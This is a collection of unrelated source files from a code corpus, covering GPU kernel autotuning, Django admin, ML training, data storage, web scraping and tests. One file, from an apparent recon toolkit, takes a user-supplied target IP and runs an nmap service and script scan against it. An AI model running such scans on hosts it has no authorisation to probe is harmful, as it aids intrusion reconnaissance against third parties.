best_config = dispatch_context.query(task.target, task.workload)
print('\nBest config:')
print(best_config)
with dispatch_context:
with tvm.target.create('cuda'):
s, arg_bufs = tvm_matmul_tune_op(batch, in_dim, out_dim)
func = tvm.build(s, arg_bufs, 'cuda', name='matmul')
ctx = tvm.context('cuda', 0)
a_np = np.random.uniform(size=(batch, in_dim)).astype("float32")
b_np = np.random.uniform(size=(in_dim, out_dim)).astype("float32")
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(b_np, ctx)
c = tvm.nd.array(np.zeros((batch, out_dim), dtype='float32'), ctx)
print(func.imported_modules[0].get_source()) # print kernel code
func(a, b, c)
num_flops = 2 * batch * in_dim * out_dim
num_runs = 10
timer_f = func.time_evaluator(func.entry_name, ctx, number=num_runs)
t = timer_f(a, b, c).mean
GFLOPS = num_flops / (t * 1e3) / 1e6
print("average time cost of %d runs = %g ms, %g GFLOPS." %
(num_runs, t * 1e3, GFLOPS))
def lookup_matmul_config(batch, in_dim, out_dim, output_log):
op_name = "tuned_dot_op_float_%d_%d_%d" % (batch, in_dim, out_dim)
log_name = FLAGS.autotvm_log
with open(log_name, "r") as fin:
log_lines = fin.readlines()
# log_records=tvm.autotvm.record.load_from_file(log_name)
log_records_all = []
log_records = []
for line in log_lines:
line = line.rstrip('\n')
# print(line)
record_json = json.loads(line)
tm = record_json['r'][0][0]
if tm > 10000000: # filter bad configs
continue
if record_json['i'][2][0] != batch or record_json['i'][2][1] != in_dim or record_json['i'][2][2] != out_dim: # filter other configs
continue
griddim_x = record_json['i'][5]["e"][2][2][0]
if griddim_x == -1:
griddim_x = int(out_dim / record_json['i'][5]["e"][2][2][1] / record_json['i'][5]["e"][2][2][2] / record_json['i'][5]["e"][2][2][3])
griddim_y = record_json['i'][5]["e"][1][2][0]
if griddim_y == -1:
griddim_y = int(batch / record_json['i'][5]["e"][1][2][1] / record_json['i'][5]["e"][1][2][2] / record_json['i'][5]["e"][1][2][3])
record = {"time": tm,
"grid": [griddim_x, griddim_y, 1],
"block": [record_json['i'][5]["e"][2][2][2], record_json['i'][5]["e"][1][2][2], 1],
"config": line}
log_records_all.append((tm, record))
# if record["block"][0] * record["block"][1] * record["block"][2] % 32 != 0:
# continue
# if record["grid"][0] * record["grid"][1] * record["grid"][2] < 16:
# continue
opt = tm * record["grid"][0] * record["grid"][1] * record["grid"][2] * record["block"][0] * record["block"][1] * record["block"][2]
if record["block"][0] * record["block"][1] * record["block"][2] % 32 != 0:
opt = tm * record["grid"][0] * record["grid"][1] * record["grid"][2] * (record["block"][0] * record["block"][1] * record["block"][2] / 32 + 1) * 32
record.update({"opt": opt})
log_records.append((tm, record))
# print(log_records[-1])
log_records_all.sort(key=lambda item: item[0])
log_records.sort(key=lambda item: item[0])
print(op_name)
log_records_fast = log_records[0:100]
# log_records_fast = log_records
log_records = []
for i in range(len(log_records_fast)):
log_records.append((log_records_fast[i][1]["opt"], log_records_fast[i][1]))
log_records.sort(key=lambda item: item[0])
print("fastest kernel:", log_records_all[0][1]["time"], "grid:", log_records_all[0][1]["grid"], "block:", log_records_all[0][1]["block"])
# print(log_records_fast[0][1]["config"])
print("efficient kernel:",log_records[0][1]["time"], "grid:", log_records[0][1]["grid"], "block:", log_records[0][1]["block"])
with open(output_log, 'a') as fout:
fout.write(log_records[0][1]["config"] + "\n")
def launch_matmul_from_config(config_json_path):
with open(config_json_path, "r") as fin:
config = json.load(fin)
batch = config["i"][2][0]
in_dim = config["i"][2][1]
out_dim = config["i"][2][2]
# print(batch, in_dim, out_dim)
task = autotvm.task.create(
tvm_matmul_tune_op, args=(batch, in_dim, out_dim), target='cuda')
# dispatch_context = autotvm.task.ApplyConfig(config)
dispatch_context = autotvm.apply_history_best(config_json_path)
best_config = dispatch_context.query(task.target, task.workload)
print("Using pretuned config:")
print(best_config)
with dispatch_context:
with tvm.target.create('cuda'):
s, arg_bufs = tvm_matmul_tune_op(batch, in_dim, out_dim)
func = tvm.build(s, arg_bufs, 'cuda', name='matmul')
ctx = tvm.context('cuda', 0)
a_np = np.random.uniform(size=(batch, in_dim)).astype("float32")
b_np = np.random.uniform(size=(in_dim, out_dim)).astype("float32")
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(b_np, ctx)
c = tvm.nd.array(np.zeros((batch, out_dim), dtype='float32'), ctx)
print(func.imported_modules[0].get_source()) # print kernel code
func(a, b, c)
num_flops = 2 * batch * in_dim * out_dim
num_runs = 10
timer_f = func.time_evaluator(func.entry_name, ctx, number=num_runs)
t = timer_f(a, b, c).mean
GFLOPS = num_flops / (t * 1e3) / 1e6
print("average time cost of %d runs = %g ms, %g GFLOPS." %
(num_runs, t * 1e3, GFLOPS))
output_log_file = "matmul_nn_autotvm_select_result.log"
if os.path.exists(output_log_file):
os.remove(output_log_file)
lookup_matmul_config(4, 256, 256, output_log_file)
lookup_matmul_config(16, 256, 256, output_log_file)
def tune_dot_codegen(m, k, n, log_path):
logging.getLogger('autotvm').setLevel(logging.DEBUG)
logging.getLogger('autotvm').addHandler(logging.StreamHandler(sys.stdout))
task = autotvm.task.create(tvm_matmul_tune_op, args=(m, k, n), target='cuda')
op_name = "tuned_dot_nn_op_float_m%d_k%d_n%d" % (m, k, n)
# log_name = "tuned_dot_op_float_%d_%d_%d" % (m, k, n)
# log_name = "tuned_kernels/" + log_name + ".log"
log_name = log_path
dispatch_context = autotvm.apply_history_best(log_name)
best_config = dispatch_context.query(task.target, task.workload)
with dispatch_context:
with tvm.target.create('cuda'):
s, arg_bufs = tvm_matmul_tune_op(m,k,n)
func = tvm.build(s, arg_bufs, 'cuda', name=op_name)
ctx = tvm.context('cuda', 0)
a_np = np.random.uniform(size=[m,k]).astype("float32")
w_np = np.random.uniform(size=[k,n]).astype("float32")
c_np = np.zeros([m,n]).astype("float32")
a = tvm.nd.array(a_np, ctx)
w = tvm.nd.array(w_np, ctx)
c = tvm.nd.array(c_np, ctx)
kernel_code = func.imported_modules[0].get_source()
func(a, w, c)
return kernel_code
def extract_ops_from_log():
dot_ops = []
dot_ops.append({'arg0_shape': [4, 256], 'arg1_shape': [256, 256], 'out_shape': [4, 256], 'transpose_A': False, 'transpose_B': False})
dot_ops.append({'arg0_shape': [16, 256], 'arg1_shape': [256, 256], 'out_shape': [16, 256], 'transpose_A': False, 'transpose_B': False})
return dot_ops
def get_tvm_topi_func_name(m, k, n):
func_name = "tuned_dot_nn_op_float_m%d_k%d_n%d_kernel0" % (m, k, n)
return func_name
def extract_tvm_profiling_from_log(log_path):
lines = open(log_path).readlines()
deduped_lines = list(set(lines))
# print(deduped_lines)
# print("#convs:", len(lines), "#deduped_convs:", len(deduped_lines))
profiling_result = {}
for line in deduped_lines:
items = line.rstrip('\n').split('|')
profiling_data = {
'gridDim': [int(items[1]), int(items[2]), int(items[3])],
'blockDim': [int(items[4]), int(items[5]), int(items[6])]
}
profiling_result.update({items[0]: profiling_data})
return profiling_result
def generate_db_topi_ops(dot_ops, log_path):
topi_ops = []
tvm_profiling_log_path = FLAGS.tvm_profile_log
if os.path.exists(tvm_profiling_log_path):
os.remove(tvm_profiling_log_path)
for dot_op in dot_ops:
m = dot_op['arg0_shape'][0]
k = dot_op['arg0_shape'][1]
n = dot_op['arg1_shape'][1]
topi_code = tune_dot_codegen(m, k, n, log_path)
topi_op = {
'tvm_func_name': get_tvm_topi_func_name(m, k, n),
'op_type': 'Dot',
'parameters': dot_op,
'code': topi_code
}
topi_ops.append(topi_op)
profiling_result = extract_tvm_profiling_from_log(tvm_profiling_log_path)
for topi_op in topi_ops:
tvm_func_name = topi_op['tvm_func_name']
topi_op.update(profiling_result[tvm_func_name])
return topi_ops
dot_ops = extract_ops_from_log()
topi_ops = generate_db_topi_ops(dot_ops, output_log_file)
with open(FLAGS.output_path, 'w') as fout:
json.dump(topi_ops, fout)
os.remove(output_log_file)
src/olympia/activity/admin.py | dante381/addons-server | 0 | 10815 |
from django.contrib import admin
from .models import ActivityLog, ReviewActionReasonLog
from olympia.reviewers.models import ReviewActionReason
class ActivityLogAdmin(admin.ModelAdmin):
list_display = (
'created',
'user',
'__str__',
)
raw_id_fields = ('user',)
readonly_fields = (
'created',
'user',
'__str__',
)
date_hierarchy = 'created'
fields = (
'user',
'created',
'__str__',
)
raw_id_fields = ('user',)
view_on_site = False
def lookup_allowed(self, lookup, value):
if lookup == 'addonlog__addon':
return True
return super().lookup_allowed(lookup, value)
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
class ReviewActionReasonLogAdmin(admin.ModelAdmin):
date_hierarchy = 'created'
fields = (
'created',
'activity_log',
'activity_log__user__email',
'reason',
)
list_display = (
'created',
'activity_log',
'reason',
'activity_log__user__email',
)
list_filter = ('reason',)
list_select_related = ('activity_log__user',)
readonly_fields = (
'created',
'activity_log',
'activity_log__user__email',
)
search_fields = ('activity_log__user__email',)
view_on_site = False
def activity_log__user__email(self, obj):
return obj.activity_log.user.email
def has_add_permission(self, request):
return False
def get_form(self, request, obj=None, **kwargs):
form = super(ReviewActionReasonLogAdmin, self).get_form(request, obj, **kwargs)
form.base_fields['reason'].widget.can_add_related = False
form.base_fields['reason'].widget.can_change_related = False
form.base_fields['reason'].empty_label = None
form.base_fields['reason'].choices = [
(reason.id, reason.labelled_name())
for reason in ReviewActionReason.objects.all()
]
return form
admin.site.register(ActivityLog, ActivityLogAdmin)
admin.site.register(ReviewActionReasonLog, ReviewActionReasonLogAdmin)
modules/nmap_script/address_info.py | naimkowshik/reyna-eye | 4 | 10816 |
import subprocess
import sys
import time
import os
#############################
# COLORING YOUR SHELL #
#############################
R = "\033[1;31m" #
B = "\033[1;34m" #
Y = "\033[1;33m" #
G = "\033[1;32m" #
RS = "\033[0m" #
W = "\033[1;37m" #
#############################
os.system("clear")
print(" ")
print(R + "[" + G + "User Summary " + R + "]" + RS)
print("""
Shows extra information about IPv6 addresses, such as embedded MAC or IPv4 addresses when available.
Some IP address formats encode extra information; for example some IPv6 addresses encode an IPv4 address or MAC address
script can decode these address formats:
• IPv4-compatible IPv6 addresses,
• IPv4-mapped IPv6 addresses,
• Teredo IPv6 addresses,
• 6to4 IPv6 addresses,
• IPv6 addresses using an EUI-64 interface ID,
• IPv4-embedded IPv6 addresses,
• ISATAP Modified EUI-64 IPv6 addresses.
• IPv4-translated IPv6 addresses and
See RFC 4291 for general IPv6 addressing architecture and the definitions of some terms.
""")
print(" ")
webb = input("" + RS + "[" + B + "ENTER TARGET " + R + "WEBSITE " + Y + "IP" + RS + "]" + G + ": " + RS)
subprocess.check_call(['nmap', '-sV', '-sC', webb])
tests/utilities/test_upgrade_checkpoint.py | cuent/pytorch-lightning | 0 | 10817 |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import os
import torch
from pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint
from pytorch_lightning.utilities.upgrade_checkpoint import upgrade_checkpoint
@pytest.mark.skip
@pytest.mark.parametrize(
"old_checkpoint, new_checkpoint",
[
(
{"epoch": 1, "global_step": 23, "checkpoint_callback_best": 0.34},
{"epoch": 1, "global_step": 23, "callbacks": {ModelCheckpoint: {"best_model_score": 0.34}}},
),
(
{"epoch": 1, "global_step": 23, "checkpoint_callback_best_model_score": 0.99},
{"epoch": 1, "global_step": 23, "callbacks": {ModelCheckpoint: {"best_model_score": 0.99}}},
),
(
{"epoch": 1, "global_step": 23, "checkpoint_callback_best_model_path": 'path'},
{"epoch": 1, "global_step": 23, "callbacks": {ModelCheckpoint: {"best_model_path": 'path'}}},
),
(
{"epoch": 1, "global_step": 23, "early_stop_callback_wait": 2, "early_stop_callback_patience": 4},
{"epoch": 1, "global_step": 23, "callbacks": {EarlyStopping: {"wait_count": 2, "patience": 4}}},
),
],
)
def test_upgrade_checkpoint(tmpdir, old_checkpoint, new_checkpoint):
filepath = os.path.join(tmpdir, "model.ckpt")
torch.save(old_checkpoint, filepath)
upgrade_checkpoint(filepath)
updated_checkpoint = torch.load(filepath)
assert updated_checkpoint == new_checkpoint
rnn/train_rnn_oneflow.py | XinYangDong/models | 0 | 10818 |
import oneflow.experimental as flow
from oneflow.experimental import optim
import oneflow.experimental.nn as nn
from utils.dataset import *
from utils.tensor_utils import *
from models.rnn_model import RNN
import argparse
import time
import math
import numpy as np
flow.env.init()
flow.enable_eager_execution()
def _parse_args():
parser = argparse.ArgumentParser("flags for compare oneflow and pytorch speed")
parser.add_argument(
"--seed", nargs="?", type=int, const=0, help="specify random seed"
)
return parser.parse_args()
def train(category_tensor, line_tensor, rnn, criterion, of_sgd):
hidden = rnn.initHidden()
for i in range(line_tensor.size()[0]):
output, hidden = rnn(line_tensor[i], hidden)
loss = criterion(output, category_tensor)
loss.backward()
of_sgd.step()
of_sgd.zero_grad()
return output, loss.numpy()[0]
# refer to: https://blog.csdn.net/Nin7a/article/details/107631078
def topk_(matrix, K, axis=1):
if axis == 0:
row_index = np.arange(matrix.shape[1 - axis])
topk_index = np.argpartition(-matrix, K, axis=axis)[0:K, :]
topk_data = matrix[topk_index, row_index]
topk_index_sort = np.argsort(-topk_data, axis=axis)
topk_data_sort = topk_data[topk_index_sort, row_index]
topk_index_sort = topk_index[0:K, :][topk_index_sort, row_index]
else:
column_index = np.arange(matrix.shape[1 - axis])[:, None]
topk_index = np.argpartition(-matrix, K, axis=axis)[:, 0:K]
topk_data = matrix[column_index, topk_index]
topk_index_sort = np.argsort(-topk_data, axis=axis)
topk_data_sort = topk_data[column_index, topk_index_sort]
topk_index_sort = topk_index[:, 0:K][column_index, topk_index_sort]
return topk_data_sort, topk_index_sort
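# Illustration of topk_ with axis=1: it returns, per row, the K largest values and
# their column indices, e.g.
#
#   m = np.array([[0.1, 0.7, 0.2],
#                 [0.5, 0.3, 0.9]])
#   topk_(m, 1)   # -> (array([[0.7], [0.9]]), array([[1], [2]]))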
def categoryFromOutput(output):
top_n, top_i = topk_(output.numpy(), 1)
category_i = top_i[0][0]
return all_categories[category_i], category_i
def timeSince(since):
now = time.time()
s = now - since
m = math.floor(s / 60)
s -= m * 60
return now, "%ds" % s
n_iters = 100000
print_every = 500
plot_every = 1000
learning_rate = (
0.005 # If you set this too high, it might explode. If too low, it might not learn
)
# decrease learning rate if loss goes to NaN, increase learnig rate if it learns too slow
def main(args):
random.seed(args.seed)
dataset_path = "./data/names"
n_categories = processDataset(dataset_path)
n_hidden = 128
rnn = RNN(n_letters, n_hidden, n_categories)
criterion = nn.NLLLoss()
rnn.to("cuda")
criterion.to("cuda")
of_sgd = optim.SGD(rnn.parameters(), lr=learning_rate)
# Keep track of losses for plotting
current_loss = 0
all_losses = []
start = time.time()
samples = 0.0
correct_guess = 0.0
for iter in range(1, n_iters + 1):
category, line, category_tensor, line_tensor = randomTrainingExample()
output, loss = train(category_tensor, line_tensor, rnn, criterion, of_sgd)
current_loss += loss
# Print iter number, loss, name and guess
if iter % print_every == 0:
start, time_str = timeSince(start)
guess, guess_i = categoryFromOutput(output)
correct = "✓" if guess == category else "✗ (%s)" % category
if correct == "✓":
correct_guess += 1
samples += 1
print(
"iter: %d / %f%%, time_for_every_%d_iter: %s, loss: %.4f, predict: %s / %s, correct? %s, acc: %f"
% (
iter,
float(iter) / n_iters * 100,
print_every,
time_str,
loss,
line,
guess,
correct,
correct_guess / samples,
)
)
# Add current loss avg to list of losses
if iter % plot_every == 0:
all_losses.append(current_loss / plot_every)
current_loss = 0
writer = open("all_losses.txt", "w")
for o in all_losses:
writer.write("%f\n" % o)
writer.close()
if __name__ == "__main__":
args = _parse_args()
main(args)
metaflow/datastore/local_storage.py | RobBlumberg/metaflow | 2 | 10819 |
import json
import os
from ..metaflow_config import DATASTORE_LOCAL_DIR, DATASTORE_SYSROOT_LOCAL
from .datastore_storage import CloseAfterUse, DataStoreStorage
from .exceptions import DataException
class LocalStorage(DataStoreStorage):
TYPE = "local"
METADATA_DIR = "_meta"
@classmethod
def get_datastore_root_from_config(cls, echo, create_on_absent=True):
result = DATASTORE_SYSROOT_LOCAL
if result is None:
try:
# Python2
current_path = os.getcwdu()
except: # noqa E722
current_path = os.getcwd()
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
check_dir = os.path.realpath(check_dir)
orig_path = check_dir
top_level_reached = False
while not os.path.isdir(check_dir):
new_path = os.path.dirname(current_path)
if new_path == current_path:
top_level_reached = True
break # We are no longer making upward progress
current_path = new_path
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
if top_level_reached:
if create_on_absent:
# Could not find any directory to use so create a new one
echo(
"Creating local datastore in current directory (%s)" % orig_path
)
os.mkdir(orig_path)
result = orig_path
else:
return None
else:
result = check_dir
else:
result = os.path.join(result, DATASTORE_LOCAL_DIR)
return result
@staticmethod
def _makedirs(path):
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
return
else:
raise
def is_file(self, paths):
results = []
for path in paths:
full_path = self.full_uri(path)
results.append(os.path.isfile(full_path))
return results
def info_file(self, path):
file_exists = self.is_file([path])[0]
if file_exists:
full_meta_path = "%s_meta" % self.full_uri(path)
try:
with open(full_meta_path, "r") as f:
return True, json.load(f)
except OSError:
return True, None
return False, None
def size_file(self, path):
file_exists = self.is_file([path])[0]
if file_exists:
path = self.full_uri(path)
try:
return os.path.getsize(path)
except OSError:
return None
return None
def list_content(self, paths):
results = []
for path in paths:
if path == self.METADATA_DIR:
continue
full_path = self.full_uri(path)
try:
for f in os.listdir(full_path):
if f == self.METADATA_DIR:
continue
results.append(
self.list_content_result(
path=self.path_join(path, f),
is_file=self.is_file([self.path_join(path, f)])[0],
)
)
except FileNotFoundError as e:
pass
return results
def save_bytes(self, path_and_bytes_iter, overwrite=False, len_hint=0):
for path, obj in path_and_bytes_iter:
if isinstance(obj, tuple):
byte_obj, metadata = obj
else:
byte_obj, metadata = obj, None
full_path = self.full_uri(path)
if not overwrite and os.path.exists(full_path):
continue
LocalStorage._makedirs(os.path.dirname(full_path))
with open(full_path, mode="wb") as f:
f.write(byte_obj.read())
if metadata:
with open("%s_meta" % full_path, mode="w") as f:
json.dump(metadata, f)
def load_bytes(self, paths):
def iter_results():
for path in paths:
full_path = self.full_uri(path)
metadata = None
if os.path.exists(full_path):
if os.path.exists("%s_meta" % full_path):
with open("%s_meta" % full_path, mode="r") as f:
metadata = json.load(f)
yield path, full_path, metadata
else:
yield path, None, None
return CloseAfterUse(iter_results())
src/Models/tools/quality.py | rahlk/MOOSE | 0 | 10820 |
from __future__ import division, print_function
from scipy.spatial.distance import euclidean
from numpy import mean
from pdb import set_trace
class measure:
def __init__(self,model):
self.mdl = model
def convergence(self, obtained):
"""
Calculate the convergence metric with respect to ideal
solutions
"""
gammas=[]
ideals = self.mdl.get_pareto()
def nearest(a,lst):
# dist = euclidean(a, sorted(lst, key=lambda x:euclidean(x,a))[0])
# set_trace()
return euclidean(a, sorted(lst, key=lambda x:euclidean(x,a))[0])
gammas = [nearest(self.mdl.solve(member),ideals) for member in obtained]
return mean(gammas)
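# A minimal, self-contained sketch of how `measure` might be used. The mock model's
# get_pareto()/solve() interface is inferred from the calls in convergence() and is
# only an assumption about the real MOOSE models.
if __name__ == "__main__":
    class _MockModel:
        def get_pareto(self):
            return [[0.0, 0.0], [1.0, 1.0]]   # "ideal" points in objective space

        def solve(self, member):
            return [0.1, 0.1]                 # objective vector of a candidate

    print(measure(_MockModel()).convergence(obtained=["a", "b"]))  # mean distance to nearest ideal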
script/spider/www_chinapoesy_com.py | gitter-badger/poetry-1 | 1 | 10821 |
'''
pip3 install BeautifulSoup4
pip3 install pypinyin
'''
import requests
import re
import os
import shutil
from bs4 import BeautifulSoup
from util import Profile, write_poem
def parse_poem_profile_td(td):
container = td.find('div')
if container is None:
container = td
title_a = container.find('a')
if title_a is None:
# maybe appears on the last page
return None
href = title_a.get('href')
title = title_a.get('title')
title = title.replace('\r\n', '').replace(
'————', '——').replace(',', ',').replace('(长诗节选)', '_长诗节选').strip()
title_a.extract()
# Wrong name 席慕蓉
author_text = container.text.replace('席慕蓉', '席慕容').strip()
author = re.findall(r'(.*)\((\d*?)\)', author_text, re.S)[0][0]
return Profile(href=href, title=title, author=author)
def read_poem_list(page):
'''
Read poem list
@param page:int
@return (poem_list:Profile[], has_next_page:Boolean)
'''
page_url = 'http://www.chinapoesy.com/XianDaiList_' + str(page) + '.html'
response = requests.get(page_url)
if response.status_code != 200:
return ([], False)
text = response.text
soup = BeautifulSoup(text, features='lxml')
# profiles
main_table = soup.find('table', id='DDlTangPoesy')
td_ = main_table.find_all('td')
poet_list = []
for td in td_:
poem = parse_poem_profile_td(td)
if poem is not None:
poet_list.append(poem)
img_neg = soup.find('img', src='/Images/Pager/nextn.gif')
return (poet_list, img_neg is not None)
def read_poem(poem):
url = 'http://www.chinapoesy.com/' + poem.href
response = requests.get(url)
if response.status_code != 200:
return None
soup = BeautifulSoup(response.text, features='lxml')
container = soup.find_all('div', class_='HeightBorderCenter')[-1]
return container.text.strip()
def main():
# delete the temp directory
has_next_page = True
page_num = 1
while has_next_page:
(current_list, has_next_page) = read_poem_list(page_num)
page_num = page_num + 1
for poem in current_list:
if(os.path.exists(poem.file_path())):
continue
content = read_poem(poem)
if not content:
print('Invalid content: ' + str(poem))
else:
write_poem(poem, content)
print('Page ' + str(page_num) + ' parsed')
if __name__ == '__main__':
    main()
| 2.96875 | 3 |
design-patterns-101/Animal.py | stealthanthrax/python-design-patterns | 0 | 10822 | class Animal:
def __init__(self):
self.name = ""
self.weight = 0
self.sound = ""
def setName(self, name):
self.name = name
def getName(self):
return self.name
def setWeight(self, weight):
self.weight = weight
def getWeight(self):
return self.weight
def setSound(self, sound):
self.sound = sound
def getSound(self):
return self.sound
| 3.53125 | 4 |
tests/test_events.py | hhtong/dwave-cloud-client | 0 | 10823 | <reponame>hhtong/dwave-cloud-client
# Copyright 2020 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from dwave.cloud.client import Client
from dwave.cloud.solver import Solver
from dwave.cloud.events import add_handler
class TestEventDispatch(unittest.TestCase):
def setUp(self):
# mock client
self.client = Client(token='token', solver={'qpu': True})
self.client._fetch_solvers = lambda **kw: self.solvers
self.client._submit = lambda *pa, **kw: None
# mock solvers
self.solver = Solver(client=self.client, data={
"properties": {
"supported_problem_types": ["qubo", "ising"],
"qubits": [0, 1, 2],
"couplers": [[0, 1], [0, 2], [1, 2]],
"num_qubits": 3,
"num_reads_range": [0, 100],
"parameters": {
"num_reads": "Number of samples to return.",
"postprocess": "either 'sampling' or 'optimization'"
},
"topology": {
"type": "chimera",
"shape": [16, 16, 4]
},
"category": "qpu",
"tags": ["lower_noise"]
},
"id": "solver1",
"description": "A test solver 1",
"status": "online"
})
self.solvers = [self.solver]
def test_validation(self):
"""Event name and handler are validated."""
with self.assertRaises(ValueError):
add_handler('invalid_event_name', lambda: None)
with self.assertRaises(TypeError):
add_handler('before_client_init', None)
def test_client_init(self):
"""Before/After client init events are dispatched with correct signatures."""
# setup event handlers
memo = {}
def handler(event, **data):
memo[event] = data
add_handler('before_client_init', handler)
add_handler('after_client_init', handler)
# client init
client = Client(token='token', unknown='unknown')
# test entry values
before = memo['before_client_init']
self.assertEqual(before['obj'], client)
self.assertEqual(before['args']['endpoint'], None)
self.assertEqual(before['args']['token'], 'token')
self.assertEqual(before['args']['kwargs']['unknown'], 'unknown')
# test exit values
after = memo['after_client_init']
self.assertEqual(after['obj'], client)
self.assertEqual(after['args']['token'], 'token')
self.assertEqual(after['args']['kwargs']['unknown'], 'unknown')
self.assertEqual(after['return_value'], None)
def test_get_solvers(self):
"""Before/After get_solvers events are dispatched with correct signatures."""
# setup event handlers
memo = {}
def handler(event, **data):
memo[event] = data
add_handler('before_get_solvers', handler)
add_handler('after_get_solvers', handler)
# get solver(s)
self.client.get_solver()
# test entry values
before = memo['before_get_solvers']
self.assertEqual(before['obj'], self.client)
self.assertIn('refresh', before['args'])
self.assertIn('filters', before['args'])
self.assertIn('qpu', before['args']['filters'])
# test exit values
after = memo['after_get_solvers']
self.assertEqual(after['obj'], self.client)
self.assertIn('qpu', after['args']['filters'])
self.assertEqual(after['return_value'], self.solvers)
def test_sample(self):
"""Before/After solver sample events are dispatched with correct signatures."""
# setup event handlers
memo = {}
def handler(event, **data):
memo[event] = data
add_handler('before_sample', handler)
add_handler('after_sample', handler)
# sample
lin = {0: 1}
quad = {(0, 1): 1}
params = dict(num_reads=100)
future = self.solver.sample_ising(lin, quad, **params)
# test entry values
before = memo['before_sample']
args = dict(type_='ising', linear=lin, quadratic=quad, params=params)
self.assertEqual(before['obj'], self.solver)
self.assertDictEqual(before['args'], args)
# test exit values
after = memo['after_sample']
self.assertEqual(after['obj'], self.solver)
self.assertDictEqual(after['args'], args)
self.assertEqual(after['return_value'], future)
| 1.84375 | 2 |
ex3_nn_TF2.py | Melykuti/Ng_Machine_learning_exercises | 3 | 10824 | <reponame>Melykuti/Ng_Machine_learning_exercises<gh_stars>1-10
'''
Neural networks. Forward propagation in an already trained network in TensorFlow 2.0-2.1 (to use the network for classification).
TF 2.0:
Option 0 takes 0.08 sec.
Option 1 takes 0.08 sec.
Option 6 takes 0.08 sec.
Option 2 takes 4.7 sec.
Option 3 takes 1.6 sec.
Option 4 takes 5.2 sec.
Option 5 takes 0.08 sec.
Option 7 takes 0.06 sec.
If pred_digit = tf.map_fn(lambda x: ...) is used, then it's much slower:
Option 0 takes 1.75 sec.
Option 1 takes 1.75 sec.
Option 6 takes 1.8 sec.
Option 2 takes 6.1 sec.
Option 3 takes 3.1 sec.
Option 4 takes 6.3 sec.
Option 5 takes 1.8 sec.
Option 7 takes 1.8 sec.
TF 2.1: option==2, 3, 4, 5, 7 work; options 0, 1 and 6 fail with "AttributeError: 'RepeatedCompositeFieldContainer' object has no attribute 'append'" (But mine hasn't installed properly.)
Option 2 takes 4.5 sec.
Option 3 takes 1.5 sec.
Option 4 takes 4.4 sec.
Option 5 takes 0.08 sec.
Option 7 takes 0.06 sec.
If pred_digit = tf.map_fn(lambda x: ...) is used, then it's much slower:
Option 2 takes 5.7-6.1 sec.
Option 3 takes 3.1 sec.
Option 4 takes 5.7-6 sec.
Option 5 takes 1.8 sec.
Option 7 takes 1.8 sec.
Be careful:
According to tf.keras.layers.Dense (https://www.tensorflow.org/api_docs/python/tf/keras/layers/Dense):
output = activation(dot(input, kernel) + bias)
The kernel matrix multiplies from right! (And the inputs are seen as a row vector.) This is why I have to transpose the loaded network parameters Theta1 and Theta2.
Earlier, according to r1.15 tf.layers.dense documentation (https://www.tensorflow.org/api_docs/python/tf/layers/dense):
outputs = activation(inputs*kernel + bias)
[In version for Tensorflow 1.x, there used to be two independent choices in program flow:
Option 1 is with tf.layers.Input()
Option 2 is without tf.layers.Input()
Option a processes single inputs (single images), takes 1.5 sec
Option b does batch processing of all images at once, takes 0.3 sec
]
<NAME>
09-19/03/2018, 27/01-07/02, 28/02/2020
'''
import numpy as np
import scipy.io # to open Matlab's .mat files
import tensorflow as tf
from tensorflow import keras
import matplotlib.pyplot as plt
import time
### User input ###
option = 7 # {0, 1, ..., 7}
### End of input ###
# The network parameters are here for info, they are not actually used.
input_layer_size = 400 # 20x20 Input Images of Digits
hidden_layer_size = 25 # 25 hidden units
num_labels = 10 # 10 labels, from 1 to 10
# (note that we have mapped "0" to label 10)
# =========== Part 1: Loading [and Visualizing] Data =============
data = scipy.io.loadmat('../machine-learning-ex3/ex3/ex3data1.mat')
X = data['X']
y = data['y']
y = y % 10 # Transforming 10 to 0, which is its original meaning.
# ================ Part 2: Loading Pameters ================
# In this part of the exercise, we load the pre-initialized
# neural network parameters.
params = scipy.io.loadmat('../machine-learning-ex3/ex3/ex3weights.mat')
Theta1 = params['Theta1'] # Theta1 has size 25 x 401
Theta2 = params['Theta2'] # Theta2 has size 10 x 26
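# Editor's illustration (not part of the original script): tf.keras.layers.Dense
# stores its kernel with shape (input_dim, units) and computes
# outputs = inputs @ kernel + bias, while Ng's Theta matrices are shaped
# (units, input_dim + 1) with the bias term in column 0. That is why column 0 is
# split off as the bias and the remainder is transposed before being handed to
# the constant initializers below.
_kernel1, _bias1 = Theta1[:, 1:].T, Theta1[:, 0]   # shapes (400, 25) and (25,)
_kernel2, _bias2 = Theta2[:, 1:].T, Theta2[:, 0]   # shapes (25, 10) and (10,)
assert _kernel1.shape == (400, 25) and _kernel2.shape == (25, 10)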
tf.keras.backend.clear_session()
start_time = time.time()
# ================= Part 3: Implement Predict =================
# After training a neural network, we would like to use it to predict
# the labels. You will now implement the "predict" function to use the
# neural network to predict the labels of the training set. This lets
# you compute the training set accuracy.
# Difference between tf.data.Dataset.from_tensors and tf.data.Dataset.from_tensor_slices: https://www.tensorflow.org/api_docs/python/tf/data/Dataset#from_tensor_slices
# from_tensors reads all data at once; from_tensor_slices reads line by line, which is preferable for huge datasets
# With from_tensors, you'd also need to pull out each row from the tensor somehow.
# https://towardsdatascience.com/how-to-use-dataset-in-tensorflow-c758ef9e4428
# https://www.tensorflow.org/programmers_guide/datasets#consuming_numpy_arrays
